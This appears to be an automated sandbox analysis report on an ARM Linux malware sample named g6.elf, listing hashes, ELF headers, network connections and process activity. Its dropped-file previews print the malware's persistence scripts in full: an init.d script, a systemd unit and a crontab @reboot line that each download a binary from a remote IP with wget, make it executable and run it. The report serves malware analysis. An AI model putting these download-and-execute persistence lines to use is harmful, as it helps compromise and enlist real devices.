                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                CLOUDFLARENETUShttp://communication.investecprivatebank.co.za/Marketing/DocFusion/Headers/PBHeaderBanner.jpgGet hashmaliciousUnknownBrowse
                                • 104.21.96.1
                                CSZ inquiry for MH raw material.exeGet hashmaliciousFormBookBrowse
                                • 188.114.96.3
                                g3.elfGet hashmaliciousUnknownBrowse
                                • 1.1.1.1
                                1001-13.exeGet hashmaliciousFormBookBrowse
                                • 188.114.96.3
                                24010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                • 104.21.32.1
                                https://file2-cdn.creality.com/file/2e068bd90e233501c8036fb25c76e092/CrealityScan_win_3.3.4-20241030.exeGet hashmaliciousUnknownBrowse
                                • 162.159.61.3
                                g4.elfGet hashmaliciousUnknownBrowse
                                • 1.1.1.1
                                msit.exeGet hashmaliciousLummaC StealerBrowse
                                • 104.21.6.116
                                tesr.exeGet hashmaliciousLummaC StealerBrowse
                                • 104.21.90.18
                                INIT7CHt1.elfGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                12.elfGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                g3.elfGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                libsocks5.soGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                g1.elfGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                na.elfGet hashmaliciousPrometeiBrowse
                                • 109.202.202.202
                                g2.elfGet hashmaliciousUnknownBrowse
                                • 109.202.202.202
                                arm5.elfGet hashmaliciousMiraiBrowse
                                • 109.202.202.202
                                boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                • 109.202.202.202
                                boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                • 109.202.202.202
                                ASGHOSTNETDEg3.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g4.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g3.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g5.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g4.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g6.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                g3.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                ppc.elfGet hashmaliciousMiraiBrowse
                                • 5.175.194.122
                                x86.elfGet hashmaliciousMiraiBrowse
                                • 5.175.146.210
                                m1.elfGet hashmaliciousUnknownBrowse
                                • 77.90.22.16
                                No context
                                No context
                                Process:/tmp/g6.elf
                                File Type:Bourne-Again shell script, ASCII text executable
                                Category:dropped
                                Size (bytes):623
                                Entropy (8bit):4.744076344567651
                                Encrypted:false
                                SSDEEP:12:i5BpMp5kTMp5Gu+a6KqCqXcy259srxylKNVUdURucTyl:ifpMr8MrPd6KqCqsyAsrxy8bp4
                                MD5:A41A7533B8CAC9FA1A94BC909D1B110A
                                SHA1:9221FBA13766651739A9591EAE7AD9047198D9BC
                                SHA-256:C879A019F4778A7D773DC974C73A4FAA5C1EDBC0FD585B4AE7855DFD1C68677B
                                SHA-512:C9FC6B897F912B0372B57C4C52153300DA8999BCF7F6596E271C80D991FC240140489710F17ECF6F9DA953B81F66FC5F1DFC1290330D1858548D89E3CC59C011
                                Malicious:true
                                Reputation:low
                                Preview:#!/bin/bash.### BEGIN INIT INFO.# Provides: hello.# Required-Start: $network $local_fs.# Required-Stop: $network $local_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: hi :).# Description: hello :).### END INIT INFO..case "$1" in. start).rm -rf /tmp/g6; wget http://103.136.41.100/g6 -O /tmp/g6; chmod 777 /tmp/g6; /tmp/g6 >C 2 R -1157128192 A arm..p4 > /dev/null 2>&1;" ;;. stop). exit 0. ;;. restart). $0 stop. $0 start. ;;. *). echo "Usage: $0 {start|stop|restart}". exit 1. ;;.esac..exit 0.
                                Process:/tmp/g6.elf
                                File Type:troff or preprocessor input, ASCII text
                                Category:dropped
                                Size (bytes):319
                                Entropy (8bit):5.267839685068323
                                Encrypted:false
                                SSDEEP:6:z8KbX9RZAMGCk4vEuIACLm+fOALMFF5CQgcyskX51IEkqTsCBLQmWA4Rv:zb9RZADJiIE+mpqCqXc2FLHWrv
                                MD5:8AC57DB17A1A75048358838CEA90A274
                                SHA1:9C99A6C40C675485A67482CEA8E5D251666B1F8D
                                SHA-256:52A37D757E1A2A4582D982842E42032A820D9B20F9AEE4C4CF193E99E38F9FF8
                                SHA-512:DFE4854777258012CF9E0C3FB9913794507EFF55B120A44DBCDE9A6EA5C3DBC849F45F0852272D0774553568D41B32FF0292C9C62E5D897221E2A12DF5108F23
                                Malicious:false
                                Reputation:low
                                Preview:[Unit].Description=hi.After=network.target..[Service].RemainAfterExit=true.TimeoutSec=30s.Restart=no.ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/g6; wget http://103.136.41.100/g6 -O /tmp/g6; chmod 777 /tmp/g6; /tmp/g6 >C 2 R -1157128192 A arm..p1 > /dev/null 2>&1;".Type=forking..[Install].WantedBy=multi-user.target.
                                Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):76
                                Entropy (8bit):3.7627880354948586
                                Encrypted:false
                                SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                Process:/tmp/g6.elf
                                File Type:troff or preprocessor input, ASCII text
                                Category:dropped
                                Size (bytes):140
                                Entropy (8bit):4.808493362967243
                                Encrypted:false
                                SSDEEP:3:SH3YFKKLf0FeMPHRCQUIycDSGuVskXQg1IUU0XzeVpFw2sePn:SH3oLMFF5CQgcyskX51IEkrw5Cn
                                MD5:5555CD57BC4C48F4CE87952DC72A34B4
                                SHA1:62DDA51DFF3CA7C791BA411A229ECD0E5B426E64
                                SHA-256:9030BC28E1DB2FD23D1F5DB1F939B5B5B2EB1784F5FCD6DB0DDC68585F6531F1
                                SHA-512:87EB0B9470349A1C64EAE511B29FAC9B902F38E489782FED9DD5ACF659277B9D0FBF9CE5885131A5FDAD03C2C050C882C443411F6A065AD3F5FECCD43A7C3F71
                                Malicious:true
                                Reputation:low
                                Preview:@rebootrm -rf /tmp/g6; wget http://103.136.41.100/g6 -O /tmp/g6; chmod 777 /tmp/g6; /tmp/g6 >C 2 R -1157128192 A arm..p2 > /dev/null 2>&1;".
                                Process:/tmp/g6.elf
                                File Type:zlib compressed data
                                Category:dropped
                                Size (bytes):259
                                Entropy (8bit):3.383607598144853
                                Encrypted:false
                                SSDEEP:6:3DDF4OXM/VUT4DF4W/IQ3j/VjmsVot/VOArB/VF:vvXNc+QS/
                                MD5:B505F08901027BC48BE5464656B3D36B
                                SHA1:E549BCAAE78C54B7E4DE0EF688823C09C1798593
                                SHA-256:150D62C1E051259EB8A0D90643BAED3D8A1511C8D27833F7BCC62E1BC3637594
                                SHA-512:38825AE08F027A6766EF3F69F69E69EF290B11491E80A9C0735B396AC5D9229B2BEA2AA9777EBBADEA33B8375F97D4A33E675A7ECD3C8C23A288D742499CB8DB
                                Malicious:false
                                Reputation:low
                                Preview:8000-1f000 r-xp 00000000 fd:00 531606 /tmp/g6.elf.26000-27000 rw-p 00016000 fd:00 531606 /tmp/g6.elf.27000-2e000 rw-p 00000000 00:00 0 .ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack]..
                                Process:/usr/bin/crontab
                                File Type:troff or preprocessor input, ASCII text
                                Category:dropped
                                Size (bytes):330
                                Entropy (8bit):5.257080859714492
                                Encrypted:false
                                SSDEEP:6:SUrpqoqQjEOP1K8XAEuLuwJOBFQ3nds5iGMQ5UYLtCFt3HYoLMFF5CQgcyskX51C:8Qj7QEuLut836UeHLUHYRqCqXcP9
                                MD5:049C3C915C1420BBF3459CDC9226CE45
                                SHA1:52A1FBF49B59CAD52C67EFB0606EF35936427402
                                SHA-256:AC4653349E82EE27C9920F3FE45C5746627CF6D2ECC0274C5F672F92A4C0FB2C
                                SHA-512:B7046C183542736B7574FAD2E2D074E6874F97B83531D2F0E638A85711B95C19D8B22486237F06109891DDA92D9C21900D9A5A813876A9274B1F1C362A3F1CC0
                                Malicious:true
                                Reputation:low
                                Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (/tmp/crontab.tmp installed on Mon Jan 13 03:08:04 2025).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@rebootrm -rf /tmp/g6; wget http://103.136.41.100/g6 -O /tmp/g6; chmod 777 /tmp/g6; /tmp/g6 >C 2 R -1157128192 A arm..p2 > /dev/null 2>&1;".
                                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                Entropy (8bit):6.120632064663438
                                TrID:
                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                File name:g6.elf
                                File size:93'396 bytes
                                MD5:741c27fc1ae05e06a0be9374d00d08e7
                                SHA1:c9c5d841481085bc14d5071c6d5c467a8bf9501d
                                SHA256:205ac62c0762881b7458328370b2007ad947870de7ea9ae281302fbf4dbcf9f9
                                SHA512:4644d94afcfbc83a35de8c06ff5c0a874fad78d201f67ee2ac5f6b37c6b7a8bd207b64e7fc24fe2ca93ec61f043150f10a4da8007ec86973a0e82d0340c79f51
                                SSDEEP:1536:/Wnx7l+jJPO0Rfjo/EjECqv53adV7kfWsZxTRtA+alU4i+Tft/lwsSnIgIZgTegg:BTRfaCW507kfWsZv0Tft9pSvJTs
                                TLSH:B593085AF9815B41C5D411BBBE1E529E33076BA8E3EA3213ED201B2537CAA1F0F77506
                                File Content Preview:.ELF..............(.........4...Tj......4. ...(........p.c.......... ... ............................d...d...............d...d...d......|9...............d...d...d..................Q.td..................................-...L..................@-.,@...0....S

                                ELF header

                                Class:ELF32
                                Data:2's complement, little endian
                                Version:1 (current)
                                Machine:ARM
                                Version Number:0x1
                                Type:EXEC (Executable file)
                                OS/ABI:UNIX - System V
                                ABI Version:0
                                Entry Point Address:0x8194
                                Flags:0x4000002
                                ELF Header Size:52
                                Program Header Offset:52
                                Program Header Size:32
                                Number of Program Headers:5
                                Section Header Offset:92756
                                Section Header Size:40
                                Number of Section Headers:16
                                Header String Table Index:15
                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                NULL0x00x00x00x00x0000
                                .initPROGBITS0x80d40xd40x100x00x6AX004
                                .textPROGBITS0x80f00xf00x149140x00x6AX0016
                                .finiPROGBITS0x1ca040x14a040x100x00x6AX004
                                .rodataPROGBITS0x1ca140x14a140x19780x00x2A004
                                .ARM.extabPROGBITS0x1e38c0x1638c0x180x00x2A004
                                .ARM.exidxARM_EXIDX0x1e3a40x163a40x1200x00x82AL204
                                .eh_framePROGBITS0x264c40x164c40x40x00x3WA004
                                .tbssNOBITS0x264c80x164c80x80x00x403WAT004
                                .init_arrayINIT_ARRAY0x264c80x164c80x40x00x3WA004
                                .fini_arrayFINI_ARRAY0x264cc0x164cc0x40x00x3WA004
                                .gotPROGBITS0x264d40x164d40xa80x40x3WA004
                                .dataPROGBITS0x2657c0x1657c0x43c0x00x3WA004
                                .bssNOBITS0x269b80x169b80x34880x00x3WA004
                                .ARM.attributesARM_ATTRIBUTES0x00x169b80x160x00x0001
                                .shstrtabSTRTAB0x00x169ce0x830x00x0001
                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                EXIDX0x163a40x1e3a40x1e3a40x1200x1204.53430x4R 0x4.ARM.exidx
                                LOAD0x00x80000x80000x164c40x164c46.11370x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                LOAD0x164c40x264c40x264c40x4f40x397c6.22680x6RW 0x8000.eh_frame .tbss .init_array .fini_array .got .data .bss
                                TLS0x164c80x264c80x264c80x00x80.00000x4R 0x4.tbss
                                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                                TimestampSource PortDest PortSource IPDest IP
                                Jan 13, 2025 10:08:00.067473888 CET43928443192.168.2.2391.189.91.42
                                Jan 13, 2025 10:08:05.521641016 CET4547953192.168.2.231.1.1.1
                                Jan 13, 2025 10:08:05.526611090 CET53454791.1.1.1192.168.2.23
                                Jan 13, 2025 10:08:05.526671886 CET4547953192.168.2.231.1.1.1
                                Jan 13, 2025 10:08:05.526741028 CET4547953192.168.2.231.1.1.1
                                Jan 13, 2025 10:08:05.531670094 CET53454791.1.1.1192.168.2.23
                                Jan 13, 2025 10:08:05.531716108 CET4547953192.168.2.231.1.1.1
                                Jan 13, 2025 10:08:05.698728085 CET42836443192.168.2.2391.189.91.43
                                Jan 13, 2025 10:08:06.722625971 CET4251680192.168.2.23109.202.202.202
                                Jan 13, 2025 10:08:07.693706036 CET488265625192.168.2.2377.90.22.16
                                Jan 13, 2025 10:08:07.698709011 CET56254882677.90.22.16192.168.2.23
                                Jan 13, 2025 10:08:07.698777914 CET488265625192.168.2.2377.90.22.16
                                Jan 13, 2025 10:08:07.710659981 CET488265625192.168.2.2377.90.22.16
                                Jan 13, 2025 10:08:07.715534925 CET56254882677.90.22.16192.168.2.23
                                Jan 13, 2025 10:08:20.288781881 CET43928443192.168.2.2391.189.91.42
                                Jan 13, 2025 10:08:32.575155020 CET42836443192.168.2.2391.189.91.43
                                Jan 13, 2025 10:08:36.670613050 CET4251680192.168.2.23109.202.202.202
                                Jan 13, 2025 10:08:38.718415976 CET488265625192.168.2.2377.90.22.16
                                Jan 13, 2025 10:08:38.723247051 CET56254882677.90.22.16192.168.2.23
                                Jan 13, 2025 10:09:01.243326902 CET43928443192.168.2.2391.189.91.42
                                Jan 13, 2025 10:09:09.434166908 CET488265625192.168.2.2377.90.22.16
                                Jan 13, 2025 10:09:09.439172029 CET56254882677.90.22.16192.168.2.23
                                Jan 13, 2025 10:09:18.789128065 CET488265625192.168.2.2377.90.22.16
                                Jan 13, 2025 10:09:18.794050932 CET56254882677.90.22.16192.168.2.23
                                Jan 13, 2025 10:09:18.964700937 CET56254882677.90.22.16192.168.2.23
                                Jan 13, 2025 10:09:18.964818954 CET488265625192.168.2.2377.90.22.16
                                Jan 13, 2025 10:09:50.388680935 CET488265625192.168.2.2377.90.22.16
                                Jan 13, 2025 10:09:50.393520117 CET56254882677.90.22.16192.168.2.23

                                System Behavior

                                Start time (UTC):09:07:58
                                Start date (UTC):13/01/2025
                                Path:/tmp/g6.elf
                                Arguments:/tmp/g6.elf
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:08:04
                                Start date (UTC):13/01/2025
                                Path:/tmp/g6.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:08:04
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:/bin/sh -c "systemctl daemon-reload > /dev/null 2>&1"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:08:04
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:08:04
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/systemctl
                                Arguments:systemctl daemon-reload
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                Start time (UTC):09:08:04
                                Start date (UTC):13/01/2025
                                Path:/tmp/g6.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:08:04
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:/bin/sh -c "crontab /tmp/crontab.tmp > /dev/null 2>&1"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:08:04
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:08:04
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/crontab
                                Arguments:crontab /tmp/crontab.tmp
                                File size:43720 bytes
                                MD5 hash:66e521d421ac9b407699061bf21806f5

                                Start time (UTC):09:08:05
                                Start date (UTC):13/01/2025
                                Path:/tmp/g6.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:08:05
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:/bin/sh -c "/etc/init.d/hello > /dev/null 2>&1"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:08:05
                                Start date (UTC):13/01/2025
                                Path:/bin/sh
                                Arguments:-
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                Start time (UTC):09:08:06
                                Start date (UTC):13/01/2025
                                Path:/tmp/g6.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:08:06
                                Start date (UTC):13/01/2025
                                Path:/tmp/g6.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:08:06
                                Start date (UTC):13/01/2025
                                Path:/tmp/g6.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:08:06
                                Start date (UTC):13/01/2025
                                Path:/tmp/g6.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:08:06
                                Start date (UTC):13/01/2025
                                Path:/tmp/g6.elf
                                Arguments:-
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                Start time (UTC):09:08:00
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/xfce4-panel
                                Arguments:-
                                File size:375768 bytes
                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                Start time (UTC):09:08:00
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
                                File size:35136 bytes
                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                Start time (UTC):09:08:00
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/xfce4-panel
                                Arguments:-
                                File size:375768 bytes
                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                Start time (UTC):09:08:00
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
                                File size:35136 bytes
                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                Start time (UTC):09:08:00
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/xfce4-panel
                                Arguments:-
                                File size:375768 bytes
                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                Start time (UTC):09:08:00
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
                                File size:35136 bytes
                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                Start time (UTC):09:08:00
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/xfce4-panel
                                Arguments:-
                                File size:375768 bytes
                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                Start time (UTC):09:08:00
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
                                File size:35136 bytes
                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                Start time (UTC):09:08:00
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/xfce4-panel
                                Arguments:-
                                File size:375768 bytes
                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                Start time (UTC):09:08:00
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
                                File size:35136 bytes
                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                Start time (UTC):09:08:00
                                Start date (UTC):13/01/2025
                                Path:/usr/bin/xfce4-panel
                                Arguments:-
                                File size:375768 bytes
                                MD5 hash:a15b657c7d54ac1385f1f15004ea6784

                                Start time (UTC):09:08:00
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
                                Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
                                File size:35136 bytes
                                MD5 hash:ac0b8a906f359a8ae102244738682e76

                                Start time (UTC):09:08:04
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/systemd/systemd
                                Arguments:-
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                Start time (UTC):09:08:04
                                Start date (UTC):13/01/2025
                                Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                File size:22760 bytes
                                MD5 hash:3633b075f40283ec938a2a6a89671b0e